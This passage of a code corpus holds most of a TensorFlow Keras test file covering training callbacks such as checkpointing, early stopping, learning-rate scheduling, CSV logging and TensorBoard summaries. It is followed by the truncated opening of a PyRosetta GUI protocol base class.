'on_predict_batch_begin': 5,
'on_predict_batch_end': 5,
'on_predict_begin': 1,
'on_predict_end': 1
})
def test_callback_list_methods(self):
counter = Counter()
callback_list = keras.callbacks.CallbackList([counter])
batch = 0
callback_list.on_test_batch_begin(batch)
callback_list.on_test_batch_end(batch)
callback_list.on_predict_batch_begin(batch)
callback_list.on_predict_batch_end(batch)
self._check_counts(
counter, {
'on_test_batch_begin': 1,
'on_test_batch_end': 1,
'on_predict_batch_begin': 1,
'on_predict_batch_end': 1
})
class KerasCallbacksTest(keras_parameterized.TestCase):
def _get_model(self, input_shape=None):
layers = [
keras.layers.Dense(3, activation='relu'),
keras.layers.Dense(2, activation='softmax')
]
model = testing_utils.get_model_from_layers(layers, input_shape=input_shape)
model.compile(
loss='mse',
optimizer='rmsprop',
metrics=[keras.metrics.CategoricalAccuracy(name='my_acc')],
run_eagerly=testing_utils.should_run_eagerly())
return model
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
def test_progbar_logging(self):
model = self._get_model(input_shape=(3,))
x = array_ops.ones((50, 3))
y = array_ops.zeros((50, 2))
dataset = dataset_ops.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*- loss:.*- my_acc:.*)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(dataset, epochs=2, steps_per_epoch=10)
self.assertRegexpMatches(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types(exclude_models='functional')
@keras_parameterized.run_all_keras_modes
def test_progbar_logging_deferred_model_build(self):
model = self._get_model()
self.assertFalse(model.built)
x = array_ops.ones((50, 3))
y = array_ops.zeros((50, 2))
dataset = dataset_ops.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*- loss:.*- my_acc:.*)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(dataset, epochs=2, steps_per_epoch=10)
self.assertRegexpMatches(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
def test_ModelCheckpoint(self):
if h5py is None:
return # Skip test if models cannot be saved.
layers = [
keras.layers.Dense(NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'),
keras.layers.Dense(NUM_CLASSES, activation='softmax')
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'checkpoint')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
# case 1
monitor = 'val_loss'
save_best_only = False
mode = 'auto'
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 2
mode = 'min'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 3
mode = 'max'
monitor = 'val_acc'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 4
save_best_only = True
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case: metric not available.
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor='unknown',
save_best_only=True)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# File won't be written.
assert not os.path.exists(filepath)
# case 5
save_best_only = False
period = 2
mode = 'auto'
filepath = os.path.join(temp_dir, 'checkpoint.{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
period=period)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=4,
verbose=1)
assert os.path.exists(filepath.format(epoch=2))
assert os.path.exists(filepath.format(epoch=4))
os.remove(filepath.format(epoch=2))
os.remove(filepath.format(epoch=4))
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=3))
# Invalid use: this will raise a warning but not an Exception.
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode='unknown')
def test_EarlyStopping(self):
with self.cached_session():
np.random.seed(123)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
cases = [
('max', 'val_acc'),
('min', 'val_loss'),
('auto', 'val_acc'),
('auto', 'loss'),
('unknown', 'unknown')
]
for mode, monitor in cases:
patience = 0
cbks = [
keras.callbacks.EarlyStopping(
patience=patience, monitor=monitor, mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
def test_EarlyStopping_reuse(self):
with self.cached_session():
np.random.seed(1337)
patience = 3
data = np.random.random((100, 1))
labels = np.where(data > 0.5, 1, 0)
model = keras.models.Sequential((keras.layers.Dense(
1, input_dim=1, activation='relu'), keras.layers.Dense(
1, activation='sigmoid'),))
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
weights = model.get_weights()
stopper = keras.callbacks.EarlyStopping(monitor='acc', patience=patience)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
# This should allow training to go for at least `patience` epochs
model.set_weights(weights)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_with_baseline(self):
with self.cached_session():
np.random.seed(1337)
baseline = 0.5
(data, labels), _ = testing_utils.get_test_data(
train_samples=100,
test_samples=50,
input_shape=(1,),
num_classes=NUM_CLASSES)
model = testing_utils.get_small_sequential_mlp(
num_hidden=1, num_classes=1, input_dim=1)
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['acc'])
stopper = keras.callbacks.EarlyStopping(monitor='acc',
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) == 1
patience = 3
stopper = keras.callbacks.EarlyStopping(monitor='acc',
patience=patience,
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_final_weights_when_restoring_model_weights(self):
class DummyModel(object):
def __init__(self):
self.stop_training = False
self.weights = -1
def get_weights(self):
return self.weights
def set_weights(self, weights):
self.weights = weights
def set_weight_to_epoch(self, epoch):
self.weights = epoch
early_stop = keras.callbacks.EarlyStopping(monitor='val_loss',
patience=2,
restore_best_weights=True)
early_stop.model = DummyModel()
losses = [0.2, 0.15, 0.1, 0.11, 0.12]
    # The best configuration is in epoch 2 (loss = 0.1000).
epochs_trained = 0
early_stop.on_train_begin()
for epoch in range(len(losses)):
epochs_trained += 1
early_stop.model.set_weight_to_epoch(epoch=epoch)
early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
if early_stop.model.stop_training:
break
# The best configuration is in epoch 2 (loss = 0.1000),
# and while patience = 2, we're restoring the best weights,
# so we end up at the epoch with the best weights, i.e. epoch 2
self.assertEqual(early_stop.model.get_weights(), 2)
def test_RemoteMonitor(self):
if requests is None:
return
monitor = keras.callbacks.RemoteMonitor()
    # This will raise a warning since the default address is unreachable:
monitor.on_epoch_end(0, logs={'loss': 0.})
def test_LearningRateScheduler(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [keras.callbacks.LearningRateScheduler(lambda x: 1. / (1. + x))]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.2) < keras.backend.epsilon()
cbks = [keras.callbacks.LearningRateScheduler(lambda x, lr: lr / 2)]
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.01 / 4) < keras.backend.epsilon()
def test_ReduceLROnPlateau(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def make_model():
random_seed.set_random_seed(1234)
np.random.seed(1337)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer=keras.optimizers.SGD(lr=0.1))
return model
# TODO(psv): Make sure the callback works correctly when min_delta is
# set as 0. Test fails when the order of this callback and assertion is
# interchanged.
model = make_model()
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=0,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)), 0.1, atol=1e-4)
model = make_model()
# This should reduce the LR after the first epoch (due to high epsilon).
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=10,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=2)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)), 0.01, atol=1e-4)
def test_ReduceLROnPlateau_patience(self):
class DummyOptimizer(object):
def __init__(self):
self.lr = keras.backend.variable(1.0)
class DummyModel(object):
def __init__(self):
self.optimizer = DummyOptimizer()
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(
monitor='val_loss', patience=2)
reduce_on_plateau.model = DummyModel()
losses = [0.0860, 0.1096, 0.1040]
lrs = []
for epoch in range(len(losses)):
reduce_on_plateau.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
lrs.append(keras.backend.get_value(reduce_on_plateau.model.optimizer.lr))
# The learning rates should be 1.0 except the last one
for lr in lrs[:-1]:
self.assertEqual(lr, 1.0)
self.assertLess(lrs[-1], 1.0)
def test_ReduceLROnPlateau_backwards_compatibility(self):
with test.mock.patch.object(logging, 'warning') as mock_log:
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(epsilon=1e-13)
self.assertRegexpMatches(
str(mock_log.call_args), '`epsilon` argument is deprecated')
self.assertFalse(hasattr(reduce_on_plateau, 'epsilon'))
self.assertTrue(hasattr(reduce_on_plateau, 'min_delta'))
self.assertEqual(reduce_on_plateau.min_delta, 1e-13)
def test_CSVLogger(self):
with self.cached_session():
np.random.seed(1337)
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'log.tsv')
sep = '\t'
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def make_model():
np.random.seed(1337)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer=keras.optimizers.SGD(lr=0.1),
metrics=['accuracy'])
return model
# case 1, create new file with defined separator
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
with open(filepath) as csvfile:
dialect = csv.Sniffer().sniff(csvfile.read())
assert dialect.delimiter == sep
del model
del cbks
# case 2, append data to existing file, skip header
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep, append=True)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# case 3, reuse of CSVLogger object
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
with open(filepath) as csvfile:
list_lines = csvfile.readlines()
for line in list_lines:
assert line.count(sep) == 4
assert len(list_lines) == 5
output = ' '.join(list_lines)
assert len(re.findall('epoch', output)) == 1
os.remove(filepath)
def test_stop_training_csv(self):
# Test that using the CSVLogger callback with the TerminateOnNaN callback
# does not result in invalid CSVs.
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
with self.cached_session():
fp = os.path.join(tmpdir, 'test.csv')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN(), keras.callbacks.CSVLogger(fp)]
model = keras.models.Sequential()
for _ in range(5):
model.add(keras.layers.Dense(2, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='linear'))
model.compile(loss='mean_squared_error',
optimizer='rmsprop')
def data_generator():
i = 0
max_batch_index = len(x_train) // BATCH_SIZE
tot = 0
while 1:
if tot > 3 * len(x_train):
yield (np.ones([BATCH_SIZE, INPUT_DIM]) * np.nan,
np.ones([BATCH_SIZE, NUM_CLASSES]) * np.nan)
else:
yield (x_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE],
y_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE])
i += 1
tot += 1
i %= max_batch_index
history = model.fit_generator(data_generator(),
len(x_train) // BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
assert len(loss) > 1
assert loss[-1] == np.inf or np.isnan(loss[-1])
values = []
with open(fp) as f:
for x in csv.reader(f):
          # On Windows, \r\n line endings may cause an empty line to be read
          # after each row. Skip empty lines.
if x:
values.append(x)
assert 'nan' in values[-1], 'The last epoch was not logged.'
def test_TerminateOnNaN(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN()]
model = keras.models.Sequential()
initializer = keras.initializers.Constant(value=1e5)
for _ in range(5):
model.add(
keras.layers.Dense(
2,
input_dim=INPUT_DIM,
activation='relu',
kernel_initializer=initializer))
model.add(keras.layers.Dense(NUM_CLASSES))
model.compile(loss='mean_squared_error', optimizer='rmsprop')
history = model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
self.assertEqual(len(loss), 1)
self.assertEqual(loss[0], np.inf)
@unittest.skipIf(
os.name == 'nt',
'use_multiprocessing=True does not work on windows properly.')
def test_LambdaCallback(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# Start an arbitrary process that should run during model
# training and be terminated after training has completed.
e = threading.Event()
def target():
e.wait()
t = threading.Thread(target=target)
t.start()
cleanup_callback = keras.callbacks.LambdaCallback(
on_train_end=lambda logs: e.set())
cbks = [cleanup_callback]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
t.join()
assert not t.is_alive()
def test_RemoteMonitorWithJsonPayload(self):
if requests is None:
self.skipTest('`requests` required to run this test')
with self.cached_session():
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.np_utils.to_categorical(y_test)
y_train = keras.utils.np_utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [keras.callbacks.RemoteMonitor(send_as_json=True)]
with test.mock.patch.object(requests, 'post'):
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1)
# A summary that was emitted during a test. Fields:
# logdir: str. The logdir of the FileWriter to which the summary was
# written.
# tag: str. The name of the summary.
_ObservedSummary = collections.namedtuple('_ObservedSummary', ('logdir', 'tag'))
class _SummaryFile(object):
"""A record of summary tags and the files to which they were written.
Fields `scalars`, `images`, `histograms`, and `tensors` are sets
containing `_ObservedSummary` values.
"""
def __init__(self):
self.scalars = set()
self.images = set()
self.histograms = set()
self.tensors = set()
def list_summaries(logdir):
"""Read all summaries under the logdir into a `_SummaryFile`.
Args:
logdir: A path to a directory that contains zero or more event
files, either as direct children or in transitive subdirectories.
Summaries in these events must only contain old-style scalars,
images, and histograms. Non-summary events, like `graph_def`s, are
ignored.
Returns:
A `_SummaryFile` object reflecting all summaries written to any
event files in the logdir or any of its descendant directories.
Raises:
    ValueError: If an event file contains a summary of an unexpected kind.
"""
result = _SummaryFile()
for (dirpath, dirnames, filenames) in os.walk(logdir):
del dirnames # unused
for filename in filenames:
if not filename.startswith('events.out.'):
continue
path = os.path.join(dirpath, filename)
for event in summary_iterator.summary_iterator(path):
if not event.summary: # (e.g., it's a `graph_def` event)
continue
for value in event.summary.value:
tag = value.tag
# Case on the `value` rather than the summary metadata because
# the Keras callback uses `summary_ops_v2` to emit old-style
# summaries. See b/124535134.
kind = value.WhichOneof('value')
container = {
'simple_value': result.scalars,
'image': result.images,
'histo': result.histograms,
'tensor': result.tensors,
}.get(kind)
if container is None:
raise ValueError(
'Unexpected summary kind %r in event file %s:\n%r'
% (kind, path, event))
container.add(_ObservedSummary(logdir=dirpath, tag=tag))
return result
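# Illustrative usage sketch (not part of the original test file): after fitting
# a model with a TensorBoard callback pointed at `logdir`, the helper above
# yields the observed tags, e.g. 'epoch_loss' under the train and validation
# subdirectories.
def _list_summaries_usage_sketch(logdir):
  summary_file = list_summaries(logdir)
  return {(summary.logdir, summary.tag) for summary in summary_file.scalars}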
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
class TestTensorBoardV2(keras_parameterized.TestCase):
def setUp(self):
super(TestTensorBoardV2, self).setUp()
self.logdir = os.path.join(self.get_temp_dir(), 'tb')
self.train_dir = os.path.join(self.logdir, 'train')
self.validation_dir = os.path.join(self.logdir, 'validation')
def _get_model(self):
layers = [
keras.layers.Conv2D(8, (3, 3)),
keras.layers.Flatten(),
keras.layers.Dense(1)
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10, 10, 1))
model.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
return model
def test_TensorBoard_basic(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
})
def test_TensorBoard_across_invocations(self):
"""Regression test for summary writer resource use-after-free.
See: <https://github.com/tensorflow/tensorflow/issues/25707>
"""
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
for _ in (1, 2):
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
})
def test_TensorBoard_batch_metrics(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir, update_freq=1)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='batch_loss'),
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
},
)
def test_TensorBoard_weight_histograms(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir, histogram_freq=1)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.histograms),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
},
)
def test_TensorBoard_weight_images(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, write_images=True)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.histograms),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.images),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0/image/0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/1'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/2'),
},
)
def _strip_layer_names(self, summaries):
"""Deduplicate summary names modulo layer prefix.
This removes the first slash-component of each tag name: for
instance, "foo/bar/baz" becomes "bar/baz".
Args:
summaries: A `set` of `_ObservedSummary` values.
Returns:
A new `set` of `_ObservedSummary` values with layer prefixes
removed.
"""
result = set()
for summary in summaries:
if '/' not in summary.tag:
raise ValueError('tag has no layer name: %r' % summary.tag)
new_tag = summary.tag.split('/', 1)[1]
result.add(summary._replace(tag=new_tag))
return result
def test_TensorBoard_invalid_argument(self):
with self.assertRaisesRegexp(ValueError, 'Unrecognized arguments'):
keras.callbacks.TensorBoard(wwrite_images=True)
# Note that this test specifies model_type explicitly.
class TestTensorBoardV2WriteModelTest(test.TestCase):
def setUp(self):
super(TestTensorBoardV2WriteModelTest, self).setUp()
self.logdir = os.path.join(self.get_temp_dir(), 'tb')
self.train_dir = os.path.join(self.logdir, 'train')
self.validation_dir = os.path.join(self.logdir, 'validation')
def fitModelAndAssertKerasModelWritten(self, model):
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir, write_graph=True)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag='keras'),
},
)
def test_TensorBoard_writeSequentialModel_noInputShape(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
model.compile('sgd', 'mse', run_eagerly=False)
self.fitModelAndAssertKerasModelWritten(model)
def test_TensorBoard_writeSequentialModel_withInputShape(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3), input_shape=(10, 10, 1)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
model.compile('sgd', 'mse', run_eagerly=False)
self.fitModelAndAssertKerasModelWritten(model)
  def test_TensorBoard_writeModel(self):
inputs = keras.layers.Input([10, 10, 1])
x = keras.layers.Conv2D(8, (3, 3), activation='relu')(inputs)
x = keras.layers.Flatten()(x)
x = keras.layers.Dense(1)(x)
model = keras.models.Model(inputs=inputs, outputs=[x])
model.compile('sgd', 'mse', run_eagerly=False)
self.fitModelAndAssertKerasModelWritten(model)
if __name__ == '__main__':
test.main()
|
ProtocolBaseClass.py
|
#!/usr/bin/env python
#
# (c) Copyright Rosetta Commons Member Institutions.
# (c) This file is part of the Rosetta software suite and is made available under license.
# (c) The Rosetta software is developed by the contributing members of the Rosetta Commons.
# (c) For more information, see http://www.rosettacommons.org. Questions about this can be
# (c) addressed to University of Washington CoMotion, email: license@uw.edu.
## @file /GUIs/pyrosetta_toolkit/modules/protocols/ProtocolBaseClass.py
## @brief Simple base class for running protocols in the GUI. Includes multiprocessing.
## @author Jared Adolf-Bryfogle (jadolfbr@gmail.com)
#Rosetta Imports
from rosetta import *
import rosetta.basic.options
#Python Imports
import multiprocessing
from multiprocessing import Pool
from multiprocessing import Queue
from multiprocessing import Process
import time
import os.path
#Tkinter Imports
#Toolkit Imports
#from window_main.IO.GUIInput import GUIInput
from app.pyrosetta_toolkit.window_main.IO.GUIOutput import GUIOutput
from app.pyrosetta_toolkit.window_modules.scorefunction.ScoreFxnControl import ScoreFxnControl
class ProtocolBaseClass:
def __init__(self, pose, score_class, input_class, output_class):
self.pose = pose
self.score_class = score_class
self.input_class = input_class
self.output_class = output_class
        #Ignore these. They are a trick to hint the Komodo IDE about the type of each of these variables, and it works.
        #They never actually run!
if 0:
#self.input_class = GUIInput()
self.output_class = GUIOutput()
self.score_class = ScoreFxnControl()
def run_protocol(self, mover):
"""
        Runs the protocol using the multiprocessing module.  Assumes the protocol has a mover associated with it and calls its apply method.
        If your protocol has no mover, you can create one in Python from the Rosetta base class, or simply override this method.
"""
#if create_master:
# master = multiprocessing.Process(name="master", target=self.run_protocol(mover, False))
# master.start()
# if not master.is_alive: self.output_class.terminal_output.set(0)
# return
self.pdb_name = self.output_class.outdir.get()+"/"+self.output_class.outname.get()
